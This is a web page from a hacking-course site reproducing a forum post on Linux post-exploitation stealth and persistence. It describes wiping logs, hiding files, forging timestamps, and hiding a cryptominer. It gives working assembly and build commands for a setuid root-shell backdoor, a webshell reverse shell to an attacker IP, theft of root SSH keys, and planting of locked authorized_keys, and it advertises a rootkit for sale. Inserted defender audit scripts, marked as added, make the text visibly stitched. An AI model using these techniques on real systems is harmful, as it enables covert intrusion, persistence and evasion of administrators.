Extreme Hacking | Sadik Shaikh
Ethical Hacking Institute Course in Pune-India
Introduction
Post-exploitation can basically be divided into two parts.
The first is stealth, and the second is persistence. You could argue exfiltration is another part, but I don’t think it’s necessarily the case. Stealth encompasses the techniques you use to avoid being found by any sysadmins, and persistence encompasses retaining access to the server.
Stealth is not an easy thing, and people screw it up a lot.
Stealth can really be divided into three parts:
- Wiping logs
- Hiding your files
- Not being loud
Wiping logs
When we talk about wiping logs, I don’t mean deleting the files that store the logs. A lot of people just rm /var/log/wtmp and /var/log/lastlog and think THAT’S FINE, NOBODY WILL NOTICE THAT.
It’s not fine.
Anyone will notice that.
I recommend instead you search for a well-written, powerful log cleaner. There are plenty of them out there, and one of the ones I recommend would be the Last Door Log Wiper. It’s available on Packetstorm; I would post the link, but I seem to need more posts for that.
That said, there are actually quite a few of them out there, and it’s worth looking around and seeing what you can see, and what feels best for you. Packetstorm is a good place to look for more oldschool-style tools like log wipers.
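A defender-side check for the in-place wiping described above, added here as an example and not part of the original post: the classic wtmp cleaners zero the target entry rather than shorten the file, so an all-NUL record in /var/log/wtmp, or a file length that is not a whole number of records, is worth a closer look. It assumes the 384-byte record layout of glibc's struct utmp on Linux and a POSIX shell.

```shell
#!/bin/sh
# Added example (not from the original post): scans a wtmp/utmp-format file
# for signs of in-place log cleaning. Assumes the 384-byte record layout of
# glibc's struct utmp on Linux.
UTMP_REC=384

# Prints the number of records that are entirely NUL bytes. Returns 2 when
# the file length is not a whole number of records, which points at a
# truncated or hand-edited file, and 0 otherwise.
zeroed_wtmp_records() {
    file=$1
    size=$(( $(wc -c < "$file") ))
    [ $((size % UTMP_REC)) -eq 0 ] || return 2
    i=0
    zero=0
    while [ $((i * UTMP_REC)) -lt "$size" ]; do
        # Drop every NUL byte of one record; nothing left means a wiped entry.
        kept=$(( $(dd if="$file" bs="$UTMP_REC" skip="$i" count=1 2>/dev/null \
                    | tr -d '\000' | wc -c) ))
        [ "$kept" -eq 0 ] && zero=$((zero + 1))
        i=$((i + 1))
    done
    echo "$zero"
    return 0
}

# Operator-facing wrapper for the live file.
check_wtmp() {
    file=${1:-/var/log/wtmp}
    if n=$(zeroed_wtmp_records "$file"); then
        echo "$file: $n zeroed record(s)"
    else
        echo "$file: length is not a whole number of $UTMP_REC-byte records"
    fi
}
```

Run `check_wtmp` (or `check_wtmp /var/log/btmp`) as root; a non-zero count on an append-only log is the signal to compare against other sources such as auth logs or remote syslog.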
Hiding your files
Don’t just create a directory called /tmp/.hidden. Everything in the world searches for hidden directories in /tmp/ now, because most of the time, they are bad news. Look at /var/tmp/, if it’s not symlinked to /tmp/. See what other locations you can write to. A command to find them is:
    find / -perm -0002 -type d -print
The less obvious the location, the better it is to hide them. Also, the less obvious the name, the better. Don’t call them things like sshscan, or bruteforce, or the ever-popular “x”. Call them things like libc.so.2.
Also, something that will help you is googling this: thegeekstuff linux touch command timestamp
The page that brings you to, on thegeekstuff site, will teach you how to change file timestamps in Linux using only the touch command, which is sufficient to fool 95% of sysadmins.
Also, you should consider investing in a good rootkit. If you check my threads, you’ll see that I’m offering a private one at a very reasonable price!
Don’t be loud
If you’re going to run a bitcoin miner, don’t run it constantly. Instead, wrap it in a script that checks if anyone is logged in first, because otherwise, somebody is going to notice you and your 100% CPU usage.
Don’t run constant port/SSH scans from the box. That’s a good way to lose access.
Don’t DROP TABLES or rm things out of frustration. Come here and ask for help if you’re having problems.
If you DO have to rm something, please remember to shred it instead of using rm. The syntax to use is shred -fuz FILENAME: -f forces write permission if needed, -u removes the file after overwriting, and -z finishes with a pass of zeros. This replaces the entire file with 0s on the drive, and prevents it being forensically recovered; shred’s own documentation warns that this does not hold on journaling or copy-on-write filesystems, on SSDs with wear levelling, or where snapshots or backups exist.
Persistence is hard. I’m going to give a few tips and recommend a few techniques.
The first technique I’d recommend is putting a setuid binary somewhere. It’s always useful to have a way to gain root even if you lose access to the root user somehow.
I’m going to give you some source code for a simple setuid wrapper for bash written in x86 assembly:
    section .text
    global begin
    begin:
        xor eax, eax
        xor ebx, ebx
        mov ebx, 0          ; uid 0
        mov eax, 0x17       ; setuid(2) on 32-bit Linux
        int 0x80
        mov ebx, bash       ; path to execute
        mov eax, 0xb        ; execve(2)
        xor ecx, ecx        ; argv = NULL
        xor edx, edx        ; envp = NULL
        int 0x80
    section .data
    bash DB "/bin/bash", 0  ; NUL-terminated path
To assemble this, use nasm. The syntax is:
    nasm -f elf -o /tmp/back1 backdoor.s
where backdoor.s is your assembly code file. Once you’ve done that, you need to use ld to link it. If you’re on a 32-bit machine (i686, aka x86), you just run:
    ld -e begin -o /tmp/backdoor /tmp/back1
If you are on a 64-bit machine, the command is much the same, but needs an extra argument:
    ld -melf_i386 -e begin -o /tmp/backdoor /tmp/back1
The binary this produces is small, convenient, and very portable. It will run on any Linux, without ever needing to be re-assembled. To use it, all you need to do is chown root:root it, and then chmod a+sx it.
When it comes to retaining access through a webshell, a good option may be to add a line of code to an existing file that triggers a reverse shell when you visit the page with a certain parameter, for example, site.site/index.php?rev=1.3.3.7 would send a shell back to 1.3.3.7. Always use a low port for your reverse shell handlers; for example, 443 and 80. These allow you to evade firewalls, and they look far less suspicious in netstat. There is an extremely popular list of simple reverse shells at pentestmonkey’s site; simply google pentestmonkey reverse shells.
Always consider a) stealing root’s SSH keys (available in /root/.ssh/id_rsa), and b) adding your own SSH keys to the authorized_keys file in /root/.ssh/ (or other users’ authorized_keys files). This allows you to log in without needing a password. Also think about using the extended filesystem attributes on these files; by running
    chattr +is /root/.ssh/authorized_keys
you essentially make the file unable to be deleted or modified. However, this may alert a sysadmin if he makes regular modifications to this file.
Another thing to consider is a good rootkit. Most of the public rootkits these days are either old, or userland. You can experiment with them, but if I may make a recommendation, in my list of threads is a very reasonable rootkit available for a very reasonable price.
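A defender’s audit for the artefacts this persistence section and the hiding-files section describe, added as an example and not part of the original post: it reuses the post’s own world-writable search, lists setuid files, looks for dot-entries in the scratch directories, and flags authorized_keys files carrying the immutable attribute. It assumes a POSIX shell and a find that supports -xdev, -path and -maxdepth; the root argument is assumed to be / in normal use.

```shell
#!/bin/sh
# Added example (not from the original post): an audit for the hiding and
# persistence artefacts described above. ROOT defaults to "/"; the checks
# can be pointed at any tree. Assumes find supports -xdev, -path, -maxdepth.

# World-writable directories, the post's own search, minus sticky-bit ones
# such as /tmp that are expected to be world-writable.
world_writable_dirs() {
    find "$1" -xdev -type d -perm -0002 ! -perm -1000 2>/dev/null
}

# Setuid files anywhere. One outside the usual system paths, or with a
# library-looking name such as libc.so.2, is the wrapper the post describes.
setuid_files() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null
}

# Dot-entries directly under the scratch directories the post points at.
hidden_in_scratch() {
    for d in "$1/tmp" "$1/var/tmp" "$1/dev/shm"; do
        [ -d "$d" ] && find "$d" -mindepth 1 -maxdepth 1 -name '.*' 2>/dev/null
    done
    return 0
}

# authorized_keys files carrying the immutable flag (chattr +i), checked only
# when lsattr exists; sshd has no need for that flag, so it is a strong signal.
immutable_authorized_keys() {
    command -v lsattr >/dev/null 2>&1 || return 0
    find "$1" -xdev -type f -name authorized_keys -path '*/.ssh/*' 2>/dev/null |
    while IFS= read -r f; do
        lsattr -d "$f" 2>/dev/null | awk '$1 ~ /i/ { print $2 }'
    done
}

# Runs every check, prefixes each finding with its check name and prints a
# count. Exit status 0 means the tree is clean.
audit_root() {
    root=${1:-/}
    n=0
    for chk in world_writable_dirs setuid_files hidden_in_scratch immutable_authorized_keys; do
        out=$("$chk" "$root" || true)
        [ -n "$out" ] || continue
        printf '%s\n' "$out" | sed "s/^/$chk: /"
        n=$((n + $(printf '%s\n' "$out" | wc -l)))
    done
    echo "findings: $n"
    [ "$n" -eq 0 ]
}
```

Run `audit_root` as root and diff its output against a known-good baseline taken at build time; a setuid file that is not owned by a package, or a new immutable key file, is what the checks are there to surface.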
Conclusion
The best way to retain access is to get experience. You need to develop your own ideas and experience using lots of tools.